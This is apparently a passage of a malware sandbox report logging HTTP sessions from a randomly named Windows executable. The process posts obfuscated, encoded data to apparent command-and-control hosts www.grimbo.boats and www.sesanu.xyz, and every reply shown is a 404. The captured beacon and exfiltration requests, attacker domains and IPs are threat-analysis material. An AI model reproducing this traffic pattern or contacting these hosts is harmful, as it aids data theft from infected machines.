Jan 13, 2025 10:20:38.907929897 CET	752	OUT	POST /mjs1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/mjs1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 75 4c 70 69 76 44 4d 72 34 5a 63 56 6f 55 71 6b 38 42 52 56 46 30 31 2b 4c 50 79 65 47 45 78 39 6f 4e 65 45 6b 6d 2f 50 32 51 66 6f 64 50 66 54 6d 48 65 4c 31 39 44 61 72 71 31 42 45 52 73 32 65 37 4e 58 68 2f 51 74 2b 6c 4d 47 37 63 39 41 2b 4c 46 35 44 61 6b 34 70 63 44 65 5a 50 6c 68 41 35 67 71 43 42 67 76 41 73 4e 6f 76 6b 63 30 54 6f 6d 62 50 4e 57 65 56 31 46 53 42 36 65 6d 59 53 79 53 6c 6e 57 6b 39 4b 5a 75 6c 4b 68 70 61 49 70 55 68 5a 54 39 32 44 64 7a 64 78 64 75 50 42 77 78 71 69 32 71 50 39 62 48 61 50 41 46 53 56 2b 65 32 5a 43 43 6e 42 72 34 47 66 4a 74 62 67 4e 51 65 4d 4b 53 41 79 55 3d Data Ascii: idTDev6P=LXJfiXnRS9CHuLpivDMr4ZcVoUqk8BRVF01+LPyeGEx9oNeEkm/P2QfodPfTmHeL19Darq1BERs2e7NXh/Qt+lMG7c9A+LF5Dak4pcDeZPlhA5gqCBgvAsNovkc0TombPNWeV1FSB6emYSySlnWk9KZulKhpaIpUhZT92DdzdxduPBwxqi2qP9bHaPAFSV+e2ZCCnBr4GfJtbgNQeMKSAyU=
Jan 13, 2025 10:20:39.552984953 CET	1092	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:39 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jc7qfFfZ7I3FRias3CFKpfZZp1SY8PwblZQ%2BjN627zoAqxQjA15%2F0o3U8WWrCiqhsYoqMxu7r88CJ4GwW3QyOOlbNO42TjHFpKY1PA%2FiEubEAiFjh%2FFIIN98f0HnP25Zr%2FDE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90144fc5a98e432c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1676&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\b^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50019	104.21.18.171	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:41.455413103 CET	10834	OUT	POST /mjs1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/mjs1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 75 4c 70 69 76 44 4d 72 34 5a 63 56 6f 55 71 6b 38 42 52 56 46 30 31 2b 4c 50 79 65 47 45 35 39 6f 37 4b 45 6d 42 54 50 78 51 66 6f 65 50 66 53 6d 48 66 4f 31 2b 7a 65 72 71 78 37 45 54 6b 32 65 5a 56 58 70 74 6f 74 6c 31 4d 47 35 63 39 4e 36 4c 46 57 44 63 45 38 70 63 54 65 5a 50 6c 68 41 37 6f 71 42 56 30 76 43 73 4e 76 6f 6b 63 77 43 59 6d 67 50 4d 2b 6f 56 31 78 64 42 4b 2b 6d 59 79 69 53 6e 56 4f 6b 77 4b 5a 57 6d 4b 68 4c 61 4a 55 4b 68 5a 6d 45 32 44 42 5a 64 32 39 75 4d 6c 78 41 31 6d 2b 32 57 38 48 46 46 50 45 32 56 54 2b 63 79 75 61 68 68 6b 33 2f 57 66 4e 43 65 77 4e 64 5a 70 57 58 61 55 78 67 61 30 30 7a 74 48 47 48 4e 32 68 6a 79 44 32 76 68 6c 4f 70 69 58 5a 70 35 2b 2b 51 54 44 71 52 38 53 67 72 69 6e 55 67 34 34 5a 70 71 66 36 2f 42 67 62 36 6d 63 54 46 59 69 4e 58 4e 30 65 79 56 48 68 55 6b 43 48 4e 35 64 73 78 67 43 51 47 65 51 39 42 50 79 4d 41 4f 57 4c 30 35 4d 53 54 36 38 7a 33 32 64 7a 53 63 37 30 4f 36 68 58 70 4d [TRUNCATED] Data Ascii: idTDev6P=LXJfiXnRS9CHuLpivDMr4ZcVoUqk8BRVF01+LPyeGE59o7KEmBTPxQfoePfSmHfO1+zerqx7ETk2eZVXptotl1MG5c9N6LFWDcE8pcTeZPlhA7oqBV0vCsNvokcwCYmgPM+oV1xdBK+mYyiSnVOkwKZWmKhLaJUKhZmE2DBZd29uMlxA1m+2W8HFFPE2VT+cyuahhk3/WfNCewNdZpWXaUxga00ztHGHN2hjyD2vhlOpiXZp5++QTDqR8SgrinUg44Zpqf6/Bgb6mcTFYiNXN0eyVHhUkCHN5dsxgCQGeQ9BPyMAOWL05MST68z32dzSc70O6hXpMHNoq4h6ciL8E586rYTheBTgXYYTHNVF9ZTP3S1j4mTG+8hhCPTXBDHqjMxZelzYFQgCOwXpkGLNKVkIzjz/Ytcus+BYAp6q7mvIOEc3CdaqdXJNkuJem08b4i6q5z5QYGJ1Ap/Vcn7BVYUkD6jc3Jbt/+DD+mJNvh8+TNVbU8AYyNOTlMqFohfqEzzzzS38/7v79uvXEnWwOEJNitIbNpN5QtOse0eG3xZ2Z25bvyPq3Am75GBSaq2xAXBIJOEf4ci2SlbnHuY6v2oJo9yPeMHfA0m+Nzpx0a/bp1+RNQ+NR4sztyHSweXkQumJ5gQUJH4aEbLX6lIkFk3F+WU7UFnznk/4hgJyw8Q/NM1w55kFtShf2/XYQcPUAeu4FjUHSrDksrO0G2MQuDUMqLqJrak5Fe4oulHvT30kxjLh0a0UNTniEDSqz0o4UP/yhnZPP45o9F9ZOovfuQBsdhIrfV+0VEfp7yAuqXbPo9Pr9mAzU4Hxf3CHvaSzJz5UsHZ/8bu96ne6Ysn6BI7xH5waNmyyydjbCVS//mI36e4tz9U0hz6wJY5vi1zWQckcrdalSYtS6xdslZDaAQsQ/EoUq5XsaPne4eMj/DNT506g+WGV+m0nGeGQqMPxX1J4j1n+0x3UTQ7NXy8mVpvJlzsVA6h4rA2kMTNFEuz [TRUNCATED]
Jan 13, 2025 10:20:42.086296082 CET	1093	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:42 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKCMPbw1omOcB84Tpt9%2BK242kenX68YxcKBKe%2B3VcggY1ULWDYxIGueMrvJNsawQ1TJ5rYIqsRGVtPgjJjSd%2Fwwy7YYoYau0wU63SEhzOfdMhboa9KleSHSDOyVZzhZTYv%2BN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90144fd58ee18c5f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1940&rtt_var=970&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\b^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50020	104.21.18.171	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:44.006392002 CET	466	OUT	GET /mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:20:44.644236088 CET	1101	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:44 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzI32YBuEIg8J1ALTg3gm%2BAJHCXDPJgNTBKHKv4kLbAqD%2FU9tTbi1Bn0k5kBZusOSD%2F6cDuYl1IlJm7%2BY0r6OZHylCHyOv8jmHFuU87KbdKbY1escpq4hTKNbcvDXmIWR5Nq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90144fe58aac4319-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50021	199.192.21.169	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:49.702526093 CET	726	OUT	POST /rf25/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Origin: http://www.sesanu.xyz Referer: http://www.sesanu.xyz/rf25/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 39 44 64 74 45 6c 62 49 70 30 78 63 56 48 6c 45 30 73 32 6c 52 51 64 31 47 77 74 43 4d 39 30 76 44 55 55 45 54 73 6f 6c 59 63 59 79 50 52 56 32 69 79 32 36 34 58 2f 73 51 76 4b 37 48 56 6d 50 41 46 51 73 4a 65 30 73 75 43 52 46 38 78 63 72 36 59 45 4e 64 71 33 2f 6b 49 39 36 68 75 50 45 66 6f 54 58 55 44 68 61 61 77 49 31 71 53 75 6b 70 4f 56 4c 46 44 69 45 69 41 42 7a 68 30 50 7a 64 77 4e 75 4f 2f 55 44 6d 58 4e 4c 35 6c 51 72 6f 39 34 67 32 78 4a 47 59 42 43 66 58 69 42 71 57 62 38 38 49 56 72 30 75 74 67 57 56 4d 74 6d 42 4d 49 62 56 51 3d 3d Data Ascii: idTDev6P=2IX2DCTLc3jG9DdtElbIp0xcVHlE0s2lRQd1GwtCM90vDUUETsolYcYyPRV2iy264X/sQvK7HVmPAFQsJe0suCRF8xcr6YENdq3/kI96huPEfoTXUDhaawI1qSukpOVLFDiEiABzh0PzdwNuO/UDmXNL5lQro94g2xJGYBCfXiBqWb88IVr0utgWVMtmBMIbVQ==
Jan 13, 2025 10:20:50.329318047 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:50 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50022	199.192.21.169	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:52.251660109 CET	746	OUT	POST /rf25/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Origin: http://www.sesanu.xyz Referer: http://www.sesanu.xyz/rf25/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 2f 67 46 74 47 47 6a 49 2b 45 78 54 66 6e 6c 45 2b 4d 32 68 52 51 42 31 47 78 70 53 4d 50 67 76 45 30 45 45 53 70 55 6c 49 4d 59 79 61 68 56 7a 38 43 32 39 34 58 37 6b 51 75 32 37 48 56 43 50 41 48 49 73 4a 70 67 72 6f 43 52 4c 70 68 63 70 6e 49 45 4e 64 71 33 2f 6b 49 70 63 68 71 6a 45 63 59 6a 58 57 68 4a 62 53 51 49 32 39 69 75 6b 74 4f 56 51 46 44 6a 58 69 42 63 6f 68 79 4c 7a 64 31 78 75 4f 72 41 41 7a 48 4e 4a 68 46 52 75 67 4d 64 4e 77 43 67 31 52 43 6d 4c 58 41 4d 4c 54 64 78 6d 5a 6b 4b 6a 38 74 45 6c 49 4c 6b 53 4d 50 31 53 4f 66 4c 43 48 58 68 34 45 51 57 52 48 75 4b 4d 53 46 51 52 68 4f 77 3d Data Ascii: idTDev6P=2IX2DCTLc3jG/gFtGGjI+ExTfnlE+M2hRQB1GxpSMPgvE0EESpUlIMYyahVz8C294X7kQu27HVCPAHIsJpgroCRLphcpnIENdq3/kIpchqjEcYjXWhJbSQI29iuktOVQFDjXiBcohyLzd1xuOrAAzHNJhFRugMdNwCg1RCmLXAMLTdxmZkKj8tElILkSMP1SOfLCHXh4EQWRHuKMSFQRhOw=
Jan 13, 2025 10:20:52.838083029 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:52 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50023	199.192.21.169	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:54.798651934 CET	10828	OUT	POST /rf25/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sesanu.xyz Origin: http://www.sesanu.xyz Referer: http://www.sesanu.xyz/rf25/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 32 49 58 32 44 43 54 4c 63 33 6a 47 2f 67 46 74 47 47 6a 49 2b 45 78 54 66 6e 6c 45 2b 4d 32 68 52 51 42 31 47 78 70 53 4d 50 34 76 44 43 49 45 54 4b 38 6c 61 63 59 79 47 78 56 79 38 43 33 68 34 54 58 67 51 75 36 30 48 58 4b 50 42 69 63 73 50 59 67 72 39 79 52 4c 78 52 63 71 36 59 46 50 64 70 66 37 6b 49 35 63 68 71 6a 45 63 62 72 58 66 54 68 62 66 77 49 31 71 53 76 72 70 4f 55 65 46 44 72 48 69 42 70 64 68 69 72 7a 64 52 74 75 49 64 38 41 75 33 4e 78 30 46 52 49 67 4d 68 4f 77 43 39 4f 52 44 43 68 58 43 51 4c 52 62 52 78 46 58 2b 73 69 66 52 38 64 71 63 6f 43 4d 59 56 4c 75 47 32 4d 30 42 4d 66 6a 2f 6d 42 35 76 65 41 33 56 54 69 65 53 2f 44 50 32 78 68 72 58 4a 54 36 76 4f 6e 79 4d 37 46 50 75 4e 6c 6c 78 2b 33 43 54 34 77 68 47 36 53 66 77 6d 62 66 73 70 67 48 4e 5a 55 6a 2f 49 49 73 53 62 59 4f 69 71 76 70 41 49 77 31 2f 4e 46 77 78 35 75 55 69 71 52 30 56 2b 4c 56 44 6c 2f 55 45 35 35 2b 4b 48 6f 34 35 51 44 57 49 65 7a 73 6d 45 68 49 72 77 77 49 4a 73 68 66 57 59 33 [TRUNCATED] Data Ascii: idTDev6P=2IX2DCTLc3jG/gFtGGjI+ExTfnlE+M2hRQB1GxpSMP4vDCIETK8lacYyGxVy8C3h4TXgQu60HXKPBicsPYgr9yRLxRcq6YFPdpf7kI5chqjEcbrXfThbfwI1qSvrpOUeFDrHiBpdhirzdRtuId8Au3Nx0FRIgMhOwC9ORDChXCQLRbRxFX+sifR8dqcoCMYVLuG2M0BMfj/mB5veA3VTieS/DP2xhrXJT6vOnyM7FPuNllx+3CT4whG6SfwmbfspgHNZUj/IIsSbYOiqvpAIw1/NFwx5uUiqR0V+LVDl/UE55+KHo45QDWIezsmEhIrwwIJshfWY3a8sdPkqa5OeRv2KrywGljJQp6FSW1ptYDp/pY7QyPXAk5dE6YK2M3Et9OM1nhEWX5PWwd7AJ6v9pdHqVeFLi8vtHwwmfbGFX5lETGFjEYfSOcyeMF/Y4FCxFPD8KDz4WNUFLhQQaUI9aWtWN3E5pUN2RT4TK4EfPnJOOik8cSwpaW708ptgLE+O7dXcuIA4XSvxzZziWas5Zf7dU+LejlBDXedKDU9M+wcaezWanYOZ+iGRmBzkuzGrXk/PBG+GGs/x3FUpHLUpaEZCr6iNliYAI6NDva+y0We/y7MSx6yG03+jkkgALm+l8fzcSMeizk1QFH1uTokiXkgwBGJlN6n//iPnt1f3KnP8jbvoDfPdAMtxjnvlaHWDpDBPZ75ZrQGOAoPSr7ZFH7atKHrTlBorFBvIYmZXhzQ6aqWdhasY8x05KHh7/l1OBsSh3qbduN+X6y+jeU4mViOpQy5hwFmdf88+Xmd4l9XsgsywNMhifgFegDcNCvNMc6ek56Nsj9y2hq4R3S5IKjWVxES0KSLHHKGcmVW5yc9oUbdzBkCYwayUiVpebt9+mazbbYJGWV5t7kc4uV3HYBZM1w7Yo4jJzuvYrs2+LQnf3BnuVzUo3Xgc3su33rqBvLtxdFAmnkwSb+r3sfyk/ZPCP8RjMFgad+DIKBIMsEn [TRUNCATED]
